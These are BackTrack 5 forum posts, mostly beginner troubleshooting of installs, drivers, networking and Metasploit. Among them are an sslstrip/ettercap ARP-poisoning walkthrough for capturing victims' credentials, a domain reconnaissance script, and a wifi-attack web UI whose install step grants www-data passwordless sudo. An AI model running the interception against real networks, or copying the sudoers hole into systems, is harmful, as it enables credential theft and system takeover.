http://updates.repository.backtrack-...uild1_i386.deb Something wicked happened resolving 'updates.repository.backtrack-linux.org:http' (-5 - No address associated with hostname)
Failed to fetch
http://updates.repository.backtrack-...untu1_i386.deb Something wicked happened resolving 'updates.repository.backtrack-linux.org:http' (-5 - No address associated with hostname)
Failed to fetch
http://updates.repository.backtrack-...buntu2_all.deb Something wicked happened resolving 'updates.repository.backtrack-linux.org:http' (-5 - No address associated with hostname)
E: Unable to fetch some archives, maybe run apt-get update or try with --fix-missing?
please help what should i do i m very new to this .......................
source list(/etc/apt)
deb
http://all.repository.backtrack-linux.org revolution main microverse non-free testing
deb
http://32.repository.backtrack-linux.org revolution main microverse non-free testing
deb
http://source.repository.backtrack-linux.org revolution main microverse non-free testing
deb
http://updates.repository.backtrack-linux.org/ revolution main microverse non-free testing
-
I'm going to explain things first. I'm using a 32 bit version of Backtrack 5r3. I've always logged in as root and didn't mess with what shouldn't be in terms of what to do/what not to do. Three days ago the error "Failed to load 'Gnome" appeared when I tried the console login. I could sign in and access the command line but whenever I clicked the typical startx the message started appearing. After trying several bug fixes that can be found via searching "xorg error fix backtrack" and "failed to load ubuntu/gnome" it changed the gnome to ubuntu.
Oddly, as root on the command line I couldn't access the xorg logs until I used chmod777. Even weirder it listed Release and and X.org as commands which aren't. My only way of actually using the computer required me to make a non-root account just so I could ask a question.
The main problem is I cannot resort to a reformat because of my job's requirement. At the current time I'm an information broker and I had one bit of important data bookmarked on tor. I need to fix the Failed to Load problem.
Note: I'm using the kde plasma failsafe to even use the non-root. I've also looked through past posts and tried most of them. The typical response I get is no such file or directory or permission denied.
-
hi guys
im from Namiba and started using backtrack since version 3
connecting to internet using a router or connecting to a wifi network is easy but how do i connect to the internet using a wifi dongle.
http://www.netman.com.na/netman_3g_packages.php
is what we use to connect in windows, linux (ubuntu) and mac but i cant get it to work in backtrack. im using bt 5 r2 at the moment
<a href="http://www.freeimagehosting.net/x8zuf"><img src="http://www.freeimagehosting.net/newuploads/x8zuf.jpg"></a>
http://www.freeimagehosting.net/x8zuf
-
Hello, :)
I'm new here, I've just downloaded BackTrack 5 R3, Desktop: GNOME, Architecture: 32, Image: ISO, After that I have downloaded and installed VMware Player then I have created a new virtual machine and I have followed the steps after the boot of backtrack I choosed "Backtrack Text - defaut boot text mode" then a black screen show up contains "Casper +........................ready" after 5 secondes a screen show up with hundred errores.. please see this image:
My PC hardware configuration:
System:
---------------
Operating System: Windows 7 Professionnel 32-bit (6.1, Build 7600) (7600.win7_rtm.090713-1255)
Language: French (Regional Setting: French)
System Manufacturer: FUJITSU SIEMENS
System Model: D1837
BIOS: Version 5.00 R1.11.1837
Processor: Intel(R) Celeron(R) CPU 3.06GHz, ~3.1GHz
Memory: 1024MB RAM
Available OS Memory: 1014MB RAM
DirectX Version: DirectX 11
User DPI Setting: Using System DPI
System DPI Setting: 96 DPI (100 percent)
Display Devices:
---------------
Card name: Intel(R) 82915G/GV/910GL Express Chipset Family
Manufacturer: Intel Corporation
Chip type: Intel(R) 82915G/GV/910GL Express Chipset
Display Memory: 122.0 MB
Current Mode: 1152 x 864 (32 bit) (60Hz)
Sound Devices
-------------
Description: Haut-parleurs (SoundMAX Integrated Digital Audio)
Also I have tried that on VirtualBox software but the same problem
I would appreciate it if you can help me with this problem
Thank you!
-
hi all,
right so i've download BT5r3, i checked the md5sum and matches up with what i've downloaded which is BackTrack5 R3 Gnome 64, i used powerISO to burn to dvd disk, it boots up to where you get the trackback screen with 5 options of which i used the 1st one, it then goes to load then halts and stops on this line...........
1.876778 kernel panic - not syncing: vfs: unable to mount root fs on unknown - block(2,0)
thats it, as far as it goes.
any ideas whats wrong.?
i got it working in VM VirtualBox using the same iso but can't select the harddrive i want to install it on using virtual box, only allows me to install it to the virtual HD within Virtualbox.
help appreciated.
rgds
J
-
I have 10 days trying to install skype and I just cant.
Code:
root@bt:~# dpkg -i skype-ubuntu-precise_4.1.0.20-1_i386.deb
dpkg: error processing skype-ubuntu-precise_4.1.0.20-1_i386.deb (--install):
package architecture (i386) does not match system (amd64)
Errors were encountered while processing:
skype-ubuntu-precise_4.1.0.20-1_i386.deb
I have found people with the same problem and a lot of different solutions and it just doesn't work to me.
I have tried more of 15 different solutions and now i realize Skype is already installed (it is in Internet > Skype). But when I click it to open it do nothing,
some one know why?
Additional Information:
Backtrack 5r3
Architecture 64
Installed in the hard drive
-
-
Hello,
I've just downloaded BT 5 R3, and in what I can see, there are almost 3 Metasploit version installed un Backtrack :
Code:
/opt/metasploit/msf3/msfconsole
/usr/local/bin/msfconsole
/pentest/exploits/framework2/msfconsole
My questions are :
Why ?
What are the one you usualy used ?
-
Hey guys,
I wrote this up to make passive information gathering a little easier. This will run a series of tools to enumeration domain information. Hope you like it!
here is the download link!
https://docs.google.com/open?id=0ByU...016eGZvcGhtYTQ
Visit
http://em3rgency.com
enum.jpg
#!/bin/bash
clear
#DEFINED COLOR SETTINGS
RED=$(tput setaf 1 && tput bold)
GREEN=$(tput setaf 2 && tput bold)
STAND=$(tput sgr0)
BLUE=$(tput setaf 6 && tput bold)
echo
echo
echo
echo $RED +##############################################+
echo $RED + em3rgencys Domain enumeration script +
echo $RED + +
echo $RED + Version 1.0 +
echo $RED + +
echo $RED +
www.em3rgency.com +
echo $RED +##############################################+
echo
echo $BLUE Visit
http://www.em3rgency.com for updates to this script. Thanks
echo
echo $BLUE This script will perform various reconnaissance on your target domain.
sleep 3
clear
echo
echo $RED **************************************;
echo $RED * 1. WHOIS lookup *;
echo $RED * 2. Dig and host list *;
echo $RED * 3. TCP traceroute *;
echo $RED * 4. DNS enumeration *;
echo $RED * 5. Fierce *;
echo $RED * 6. Nmap *;
echo $RED * 7. Enumerate ALL *;
echo $RED * 8. EXIT *;
echo $RED **************************************;
echo $BLUE Select Menu Option:$STAND
read menuoption
if [ $menuoption = "1" ]; then
echo Enter the target EG. domain.org
read target
whois $target
echo
read -p Please press ENTER to return to the menu
./enum.sh
else
if [ $menuoption = "2" ]; then
echo Enter the target EG. domain.org
read target
dig $target any
echo
echo
host -l $target
echo
read -p Please press ENTER to return to the menu
./enum.sh
else
if [ $menuoption = "3" ]; then
echo Enter the target EG. domain.org
read target
echo
echo $STANDPlease type the name of your network interface Example: eth0
read IFACE;
echo
echo
tcptraceroute -i $IFACE $target
./enum.sh
else
if [ $menuoption = "4" ]; then
echo Enter the target EG. domain.org
read target
echo
cd /pentest/enumeration/dns/dnsenum
perl dnsenum.pl enum -f dns.txt update a -r $target
echo
read -p Please press ENTER to return to the menu
./enum.sh
else
if [ $menuoption = "5" ]; then
echo Enter the target EG. domain.org
read target
echo
cd /pentest/enumeration/dns/fierce
perl fierce.pl -dns $target
echo
read -p Please press ENTER to return to the menu
./enum.sh
else
if [ $menuoption = "6" ]; then
echo Enter the target EG. domain.org
read target
echo
cd /root
nmap -PN -n -F -T4 -sV -A -oG $target.txt $target
echo
read -p Please press ENTER to return to the menu
./enum.sh
else
if [ $menuoption = "7" ]; then
echo Enter the target EG. domain.org
read target
echo
echo
whois $target
echo
echo
dig $target any
echo
echo
host -l $target
echo
echo
tcptraceroute -i eth0 $target
echo
echo
cd /pentest/enumeration/dns/dnsenum
perl dnsenum.pl enum -f dns.txt update a -r $target
echo
echo
echo dnstracer $target
dnstracer $target
echo
echo
cd /pentest/enumeration/dns/fierce
perl fierce.pl -dns $target
echo
echo
cd /pentest/enumeration/web/lbd
./lbd.sh $target
echo
echo
cd /pentest/enumeration/list-urls
./list-urls.py http://www.$target
echo
echo
cd /root
nmap -PN -n -F -T4 -sV -A -oG $target.txt $target
echo
echo
amap -i $target.txt
echo
echo
cd /pentest/enumeration/web/httprint/linux
./httprint -h www.$target -s signatures.txt -P0
echo
echo
read -p Please press ENTER to return to the menu
./enum.sh
else
if [ $menuoption = "8" ]; then
exit
fi
fi
fi
fi
fi
fi
fi
fi
Immagini allegate
-
So i am trying to boot it on my windows 8 pc but i cant get it to boot. I used unetbootin to put the iso (BT5R3-GNOME-64) onto the usb and everytime i try and boot it windows gives me an error saying "unable to boot USB". I checked the md5 of the iso and it matches what it says on the site. What am i doing wrong?
-
Remmina (RDP client) is crashing when I hit the enter key. But not at first... only after a compiz cube related crash. Once the crash occurs, I can not recover. I've used Remmina 0.7.4 for 2 years on Ubuntu 10.04. but for some reason there is a new problem with Remmina 0.7.4 on backtrack 5r3 (64bit).
New install of bt5r3 (64bit), Remmina works fine. Then I added and configured Compiz (cube), still works fine. I ran a session for 24 hours to be certain. Then, one time I was spining the cube to a different desktop, Remmina crashed with an "error" stating it was auto-detecting the US-EN keyboard. I've since found that that is not an error message, just a statement of fact. I manually set the US-EN keybaord, the error goes away and I'm left with an empty error box... with an 'OK' button and nothing else. So I have no error message, just a failure of the application.
The really interesting part is that once Remmina fails, remember I ran sucessfully for 24 hours... But once it fails, it doesn't work anymore.
I've tried reinstalling Remina
I've tried removing Compiz
Once it fails, the only thing I can do to repair it is to completely re-install the OS. I know that's ridiculous, but I don't now how to find what's damaged.
I've emailed the author (2 weeks ago), but I don't expect any help because I've talked with him before, he's moved on to freerdp, and the current version of Remmina will not work with 10.04.
-
Hello guys,
I use HP pavilion dv6 with graphics card:
01:00.0 VGA compatible controller: ATI Technologies Inc Whistler XT [AMD Radeon HD 6700M Series]
Ok now, when I use Ubuntu, my graphics are perfect, but in backtrack its kind of ugly...
so what I want to ask is, can I apply ubuntu graphics settings, sources, packages or anything like that on backtrack again?
This might be a stupid question :D but I really want to know :)
BTW, I install the driver installer the .run one, and when I rebooted, after "startx" the screen went black... forever. :|
-
Here is the first Beta Version for Developers of my UWUI Blackops Wifi for BackTrack 5.
https://www.dropbox.com/s/xl2j7u01rs...uwui_03.tar.gz
It's a Web User Interface with hacking functionalities:
- Manage Interfaces: up, down, monitor mode ...
- Manage Process associated to the interface: kill, hide ...
- Manage Files associated to the Process: view, delete, special actions for .csv & .cap
- Graphical iwlist (in real time) with connecting action and keys database.
- Graphical airodump (in real time), APs and associted Stations. Online/Offline (using last view seen)
- Graphical Host Discovery (in real time using ARP table)
- AutoDecrypter WIFI keys using patterns (test with Spanish WiFis)
- Actions for IPs: nmap, nc, arpspoof, tcpdump, sslstrip, set as targets, set alias ...
- Actions for APs & Stations: airodump, aireplay, aircrack, chopchop, fragment, set as target, set alias ...
- Very easy to add new actions & info.
Developed with PHP, HTML & Javascript.
System Info
IP Actions
Install:
1 - Decompress uwui.tar.gz in /var/www
2 - Run visudo and add the line:
www-data ALL=NOPASSWD: ALL
3 - cp /var/www/uwui/bin/bin_intel/* /usr/bin
4 - cp /var/www/uwui/bin/scripts/* /usr/bin
5 - apt-get install weplab
6 - Start Apache:
/etc/init.t/apache2 start
7 - In Firefox go to
http://127.0.0.1/uwui
Tips:
To show the info window of a node click over the icon
To show the actions window of a node click over the zone of the text.
If you want help me with the look and feel of the interface you need modify the files:
- /var/www/uwui/css/uwui.css
- /var/www/uwui/php/uwui_function.php
If you want help add new actions (new wifi attacks, etc ...) or new info in info windows you need modify the files:
- /var/www/uwui/php/uwui_actions.php
- /var/www/uwui/php/uwui_info.php
If you want help optimizing or debuging you need modify the file:
- /var/www/uwui/php/uwui_core.php
-
i recently downloaded BT5 from the website and installled it on a vertiual machine. once installation is finished i tried to update everything using the setps below
#apt-get update && apt-get upgrade
After that i tried to updating Metasploit by uninstalling and then reinstalled it, guessing that this would installed latested Metasploit, like below
#cd /opt/framework3
/opt/framework3#./uninstall
/opt/framework3#apt-get install metasploit
Then i tried to connecting to msfconsole , but it gave me an error asshown below
#msfconsole
shell-init:error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
shell-init:error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
shell-init:error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
/opt/metasploit/msf3/lib/fastlib.rb:362:in 'pwd' : No such file or directory - getcwd (errno: : ENOENT)
from /opt/metasploit/msf3/lib/fastlib.rb:362: in '<mudle:Kernel>'
from /opt/metasploit/msf3/lib/fastlib.rb:355: in '<top (required)>'
from /opt/metasploit/ruby/lib/ruby/1.9.1/rubygems/custom_require.rb:36: in 'require'
from /opt/metasploit/ruby/lib/ruby/1.9.1/rubygems/custom_require.rb:36: in 'require'
from /opt/metasploit/msf3/msfconsole:18: in '<main>'
can anyone help or can anyone tell me how to update metasploit on BT5, if im doing it wrongly.
Thanks
-
-
I've been scratching my head the last few days and finally found the answer to why I wasn't getting credentials to logins at sites.
A LOT of videos and how-to write ups for ettercap and sslstrip and everyone seems to say something different. I have to give credit to Maverick35 for leading me in this direction to find the answer
Other sites I've been to say to do the following (ex.):
#Open Terminal
#Redirects requests on port 80 to sslstrip running on port 10000
Quote:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000]
Quote:
echo "1" > /proc/sys/net/ipv4/ip_forward
#You can check the forwarding if you want by typing:
Quote:
cat /proc/sys/net/ip_forward
#You should see a "1" there
#New Terminal
#Run sslstrip logging on port 10000
Quote:
sslstrip -p -f
#I use -p for log only SSL Posts. -f substitutes a lock favicon on secure requests
#(Optional) You can monitor the log
Quote:
tail -F sslstrip.log
#Launch ettercap gui with packet dump
Quote:
ettercap -G -w ~/ettercap_packets.pcap
#In Ettercap enter unified sniffing
Quote:
Sniff->Unified Sniffing
#Select your interface
Quote:
wlan0 (example)
#Scan for hosts
Quote:
Hosts->Scan for hosts
#View hosts list for scan
Quote:
Hosts->Hosts list
#Select Targets
Quote:
Highlight the victim -> Add to Target 1
Highlight the victim -> Add to Target 2
#View the added targets
Quote:
Targets -> Current Targets
#Perform Arp poisoning (Mitm attack) on targets
Quote:
Mitm -> Arp Poisoning (Sniff remote connections)
#Start
Quote:
Start -> Start Sniffing
This was giving me no love here. If you man ettercap you will see that ettercap already does the forwarding for you (/proc/sys/net/ipv4/ip_forward) so there is no need to do it. In fact if you run ettercap after you type in that command it will just set the (/proc/sys/net/ipv4/ip_forward) back to "0" afterwards. Try cat /proc/sys/net/ipv4/ip_forward after running ettercap and you will see it will set the kernel to "0". It describes it in the man page.
The real issue I was having was with sslstrip. I didn't know it until a little while ago. I wasn't getting credentials on all sites like I was hoping. Come to find out sslstrip (I'm using .9 version) only works with python 2.5 and up. If you look at the sslstrip.py file at gedit /pentest/web/sslstrip/sslstrip.py you will see at the top:
Quote:
#!/usr/bin/env python
#You need to change it to:
Quote:
#!/usr/bin/python2.6
The quickest way to setup everyting for me and have it working is without GUI and just type below:
iptables -t nat --flush (To flush any added rules to the nat tables)
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sslstrip -p -f (only logging https and uses the Favicon)
OPEN another terminal:
ettercap -Tqi "your interface" -M arp:remote /Victim/ /Gateway/ -P autoadd (you can also just do // /Gateway/ , if you want to get all targets)
Thats it. After that everything was working smooth.
-
Hi every one. In my previous post I wanted to know if it was possible to install oracle onto my Backtrack system and if yes how? The question was pending for moderation and apparently something went wrong and I am not even able to figure out if my post was actually seen by the moderators. Any ways no offense. I was just wondering if i could get an answer for that query of mine and also the next one here...
I know that my Backtrack 5 r2 installation has eclipse installed (evident from the search results returned by the default software management tool of Backtrack), but I am not able to figure out where and how to start the eclipse ide from.
I have been a windows user so far but have always been a huge fan and supporter of Linux ever since. It is just now that i am determined to shift over completely from Windows to Linux and especially Backtrack. Having said that I am relatively new to the Linux world.
So please help me with any inputs you can.
Hearty thanks in advance.:o
-
-
The title say it all, no need to explain to much, easy-creds is an automated script for MITM attacks, can be used by newbies or experts for those who want to save lots of time instead of setting fake AP manually,
what you need ? all in backtrack 5 r3 except dhcp3-server,
commands used ? all in the video,
http://vimeo.com/55579219
-
I've made a bootable Pendrive with the BT5R3-GNOME-64.iso file.
When i try to boot my Laptop HP Pavilion dv6 I see only a black screen with this message:
"SYSLINUX 4.03 2010-10-22 EDD Copyright (C) 1994-2010 N. Peter Anvin et"
and then stop there.
What happens?.
I had another Laptop and I've worked with Backtrack without Problem.
Thank you in advanced.
-
dear friends
last night i downloaded backtrack : BT5R3-KDE-64_2 and then i connected my computer to internet it said update ... i updated a huge files updated i thinks there was some patch they ware...
after i restart my computer this page was appeared : user name and password i didn't change any thing i just downloaded and install updates after i install BT5R3-KDE-64_2
i have searched lots on web but i coudln't solve it...\
by the way i tired root/toor az username/passwd
20121214_002.jpg
Immagini allegate
-
Hi, can someone tell me how to configure and start vsftpd (FTP Server) or another one FTP Server. I have followed several guides and everything is config but i get an error message connection refused.
I want to use ftp to transfer files between my Android OS and Backtrack
Or if someone have another method please tell me how to.
Thanks
-
I have spent quiet some time on Linux and BackTrack (although I'm new to forum here). So now I wish to make some Tutorial videos on Backtrack. I got "xvidcap" and "recordmydesktop" all ready and working on Backtrack. But they are not recording Audio from my internal HP DV5 Mic. I checked other apps and mic is not working at all in BackTrack.
Things I have tried :
--> Check input volume and all in 'alsamixer' ..
--> Configure the alsa.conf file and added the line 'option snd-intel model=hp-dv5'
and reloaded alsa
--> Searched the internet the whole day long (Yes! whole day) ,
it seems nobody has got the internal mic working on BackTrack since they have posted solutions like make a video recording and then ADD the sound later by editing the video is "lives" or such video editor.
I want to add the sound AS I'm making the video NOT Later on.
Please help me out.
(Please Do Not post such replies as BackTrack is built for pen testing only so it wouldn't do this and that . Thanks)
-
Morning all, what im trying to do today is make my distro of BackTrack automatically startx.
Here is the script I am instructed to edit.
#!/bin/sh -e
#
# rc.local
#
# This script is executed at the end of each multiuser runlevel.
# Make sure that the script will "exit 0" on success or any other
# value on error.
#
# In order to enable or disable this script just change the execution
# bits.
#
# By default this script does nothing.
exit 0
Now here is what I am supposed to add
just add this line : su -c root startx
in /etc/rc.local
save and reboot your system
where in the above script would i place this? I'm afraid to add it without confirmation as I may cause non-reversible damage
-
-
Hi everybody !
I have a problem with Armitage and i don't find any solution :
When i want to lunch a an exploit, now the default LHOST always is an IP that i put manually one day (192.168.0.13)
For each exploit, i have that ip by default and i can't to fix that to let it empty, and that armitage take my real ip on the network (192.162.0.12)
When a open the windows before launch an exploit, the wrong ip 192.168.0.13 is present. I can change it but i would prefer that
armitage take it automatically. I think it can make some troubles in hail mary too if it take 192.168.0.13 by default...
how can i fix it to have a automatical LHOST and that armitage launch the exploit automatically with my real ip on the network ?
Modify a config file ? remove a user file ? Options in armitage to recover default configuration ? Armitage or metasploit problem ? (i tried to put a "set LHOST 192.168.0.12" in msf console, but armitage continue to put 193.168.0.13 by default in LHOST")
Thanks !
(sorry for my english :P)
----------------------------------------
Backtrack 5 R3
Armitage 1.44 (26 nov 2012)
Msf last update
-
So, i got this error up on my system.
Fully encrypted with luks. No way to open the OS. But after doing a bit of searching and, 3AM messing around, i managed to fix it. Im not sure how i did it, but i did. These are the step i took....if you can clean it up a bit please do.
PHP Code:
1. Boot up live cd, and log into startx
2. apt-get update
3. apt-get instal hashalot lvm2
4. cryptsetup luksOpen /dev/[your logical partition] pvcrypt
5. Execute (in the SAME terminal):
a. mkdir /mnt/backtrack5
b. mount /dev/mapper/vg-root /mnt/backtrack5
c. mount /dev/sdb1 /mnt/backtrack5/boot
d. chroot /mnt/backtrack5
e. mount -t proc proc /proc
f. mount -t sysfs sys /sys
g. apt-get update
h. apt-get install hashalot lvm2
6. Navigate through file browser to /mnt/backtrack5/etc/crypttab and open in text editor
7. You are now editing a file. Add the following:
a. pvcrypt /dev/sdX2 none luks
b. /dev/sdX2 should be the encrypted partition
8. Quit vi (:wq) and execute:
a. Navigate in file browser to /mnt/backtrack5/etc/fstab and open in text editor
b. Change the line about the root partition (the only line with "/" in it. NOT /boot!), make it: "/dev/mapper/vg-root / ext4 defaults 0 1"
9. Execute:
a. cd ~
b. wget http://www.infosecramblings.com/cryptroot.patch
c. patch -u /usr/share/initramfs-tools/scripts/local-top/cryptroot ./cryptroot.patch
d. apt-get update
e. apt-get upgrade
f. apt-get dist-upgrade
g. chroot /mnt/backtrack5
h. update-initramfs -k all u
That should be it. A few of these steps may not be required. I am not a linux genius, but i am good at searching google for the answer....After a while checking i found this, and managed to get my encrypted install working again. If you can bugcheck this and trim it down, please do.
Just make sure you tell us so we can benefit
-
I know, I know...not another noob networking thread. I feel like I have looked through hundreds at this point, spending countless hours ifconfigging and such.
I have made a little progress which I will go over shortly but first let me state my problem and give some information about the output from some bash commands.
I can't seem to get my wireless working or get any sort of connection to the internet.
I am on a HP-pavilion laptop and I previously had ubuntu installed and networking worked perfectly fine.
My wireless card:
Atheros Communications Inc. AR242x /AR542x
Wireless Network adapter (PCI-Express) [168c:001c] (rev 01)
________________________________________________
rfkill list displays:
Code:
0: hp-wifi: Wireless LAN
Soft blocked: no
Hard blocked: no
1: phy0: Wireless LAN
Soft blocked: no
Hard blocked: no
________________________________________________
lshw -C network displays:
Code:
*-network
description: Ethernet interface
product: MCP65 Ethernet
vendor: nVidia Corporation
physical id: 6
bus info: pci@0000:00:06.0
logical name: eth0
version: a3
serial: 00:1b:24:f9:3c:5d
capacity: 1GB/s
width: 32 bits
clock: 66MHz
capabilities: pm bus_master cap_list ethernet physical mii 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation
configuration: autonegotiation=on broadcast=yes driver=forcedeth driverversion=0.64 latency=0 link=no maxlatency=20 mingnt=1 multicast=yes port=MII
resources: irq:20 memory:f2487000-f2487fff ioport:30e0(size=8)
*-network
description: Wireless interface
product: AR242x / AR542x Wireless Network Adapter (PCI-Express)
vendor: Atheros Communications Inc.
physical id: 0
bus info: pci@0000:03:00.0
logical name: wlan0
version: 01
serial: 00:1e:4c:45:b2:42
width: 64 bits
clock: 33MHz
capabilities: pm msi pciexpress msix bus_master cap_list ethernet physical wireless
configuration: broadcast=yes driver=ath5k driverversion=3.2.6 firmware=N/A latency=0 link=no multicast=yes wireless=IEEE 802.11bg
resources: irq:16 memory:f2000000-f200ffff
_________________________________________________
My ifconfig displays:
Code:
eth0 Link encap:Ethernet HWaddr 00:1b:24:f9:3c:5d
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Interrupt:20 Base address:0xe000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:319 errors:0 dropped:0 overruns:0 frame:0
TX packets:319 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:95797 (95.7 KB) TX bytes:95797 (95.7 KB)
wlan0 Link encap:Ethernet HWaddr 00:1e:4c:45:b2:42
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
__________________________________________________
My dhclient, when run, displays:
Code:
All rights reserved.
For info, please visit https://www.isc.org/software/dhcp/
Listening on LPF/eth0/00:1b:24:f9:3c:5d
Sending on LPF/eth0/00:1b:24:f9:3c:5d
Listening on LPF/wlan0/00:1e:4c:45:b2:42
Sending on LPF/wlan0/00:1e:4c:45:b2:42
Sending on Socket/fallback
DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 6
DHCPDISCOVER on eth0 to 255.255.255.255 port 67 interval 7
DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 20
DHCPDISCOVER on eth0 to 255.255.255.255 port 67 interval 8
DHCPDISCOVER on eth0 to 255.255.255.255 port 67 interval 10
DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 19
DHCPDISCOVER on eth0 to 255.255.255.255 port 67 interval 11
DHCPDISCOVER on eth0 to 255.255.255.255 port 67 interval 9
DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 12
DHCPDISCOVER on eth0 to 255.255.255.255 port 67 interval 15
DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 4
DHCPDISCOVER on eth0 to 255.255.255.255 port 67 interval 1
No DHCPOFFERS received.
No working leases in persistent database - sleeping.
__________________________________________________ __
Any help would be much appreciated and I can provide any other information necessary. I am new to backtrack and relatively new to bash, although I am proficient
at maneuvering around the file tree via the command line and doing basic file manipulation. I have learned a lot of different things from reading through the forum posts of people who have similar problems to mine.
Unfortunately none of their problems were exact and therefore I have not been able to come to a conclusion. When i first started i was getting a DISABLED next to the second *-network in the output of lshw -C networking command
but i found a post with a command that edited the athk5 and somehow that fixed it. Still no network connections...
Any ideas?
Cheers,
Rossay
-
I know, I know...not another noob networking thread. I feel like I have looked through hundreds at this point, spending countless hours ifconfigging and such.
I have made a little progress which I will go over shortly but first let me state my problem and give some information about the output from some bash commands.
I can't seem to get my wireless working or get any sort of connection to the internet.
I am on a HP-pavilion laptop and I previously had ubuntu installed and networking worked perfectly fine.
My wireless card:
Atheros Communications Inc. AR242x /AR542x
Wireless Network adapter (PCI-Express) [168c:001c] (rev 01)
________________________________________________
rfkill list displays:
Code:
0: hp-wifi: Wireless LAN
Soft blocked: no
Hard blocked: no
1: phy0: Wireless LAN
Soft blocked: no
Hard blocked: no
________________________________________________
lshw -C network displays:
Code:
*-network
description: Ethernet interface
product: MCP65 Ethernet
vendor: nVidia Corporation
physical id: 6
bus info: pci@0000:00:06.0
logical name: eth0
version: a3
serial: 00:1b:24:f9:3c:5d
capacity: 1GB/s
width: 32 bits
clock: 66MHz
capabilities: pm bus_master cap_list ethernet physical mii 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation
configuration: autonegotiation=on broadcast=yes driver=forcedeth driverversion=0.64 latency=0 link=no maxlatency=20 mingnt=1 multicast=yes port=MII
resources: irq:20 memory:f2487000-f2487fff ioport:30e0(size=8)
*-network
description: Wireless interface
product: AR242x / AR542x Wireless Network Adapter (PCI-Express)
vendor: Atheros Communications Inc.
physical id: 0
bus info: pci@0000:03:00.0
logical name: wlan0
version: 01
serial: 00:1e:4c:45:b2:42
width: 64 bits
clock: 33MHz
capabilities: pm msi pciexpress msix bus_master cap_list ethernet physical wireless
configuration: broadcast=yes driver=ath5k driverversion=3.2.6 firmware=N/A latency=0 link=no multicast=yes wireless=IEEE 802.11bg
resources: irq:16 memory:f2000000-f200ffff
_________________________________________________
My ifconfig displays:
Code:
eth0 Link encap:Ethernet HWaddr 00:1b:24:f9:3c:5d
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Interrupt:20 Base address:0xe000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:319 errors:0 dropped:0 overruns:0 frame:0
TX packets:319 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:95797 (95.7 KB) TX bytes:95797 (95.7 KB)
wlan0 Link encap:Ethernet HWaddr 00:1e:4c:45:b2:42
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
__________________________________________________
My dhclient, when run, displays:
Code:
All rights reserved.
For info, please visit https://www.isc.org/software/dhcp/
Listening on LPF/eth0/00:1b:24:f9:3c:5d
Sending on LPF/eth0/00:1b:24:f9:3c:5d
Listening on LPF/wlan0/00:1e:4c:45:b2:42
Sending on LPF/wlan0/00:1e:4c:45:b2:42
Sending on Socket/fallback
DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 6
DHCPDISCOVER on eth0 to 255.255.255.255 port 67 interval 7
DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 20
DHCPDISCOVER on eth0 to 255.255.255.255 port 67 interval 8
DHCPDISCOVER on eth0 to 255.255.255.255 port 67 interval 10
DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 19
DHCPDISCOVER on eth0 to 255.255.255.255 port 67 interval 11
DHCPDISCOVER on eth0 to 255.255.255.255 port 67 interval 9
DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 12
DHCPDISCOVER on eth0 to 255.255.255.255 port 67 interval 15
DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 4
DHCPDISCOVER on eth0 to 255.255.255.255 port 67 interval 1
No DHCPOFFERS received.
No working leases in persistent database - sleeping.
__________________________________________________ __
Any help would be much appreciated and I can provide any other information necessary. I am new to backtrack and relatively new to bash, although I am proficient
at maneuvering around the file tree via the command line and doing basic file manipulation. I have learned a lot of different things from reading through the forum posts of people who have similar problems to mine.
Unfortunately none of their problems were exact and therefore I have not been able to come to a conclusion. When i first started i was getting a DISCONNECTED next to the second *-network in the output of lshw -C networking command
but i found a post with a command that edited the athk5 and somehow that fixed it. Still no network connections...
Any ideas?
Cheers,
Rossay
-
Hey guys... I am comfused, or I may be thinking this through to hard: But I would like to know Which version I need to download with my windows 7. Pretty much, I am asking, What do I download, because do I have to DL linux for windows to run separate in the VMware player? Or what? that is confusing. I will list my hardware below, and please post what I need to make it happen. Its really confusing me... But I do have VMware... I have windows XP Pro on it. I will remove it if needed;
Based on the different Versions of back track there are different sub-load versions that need to be selected that I am confused about. I want to run it from my VMware side of my hard drive. Since its partitioned already for XP, either I can delete that part and start over... Or, Can I download it to VMware and start another remote session with another partition??? Ive got the rooom.... Based on that, which version will work best for my system and which of these below do I need to select in order to download?
BackTrack Release:
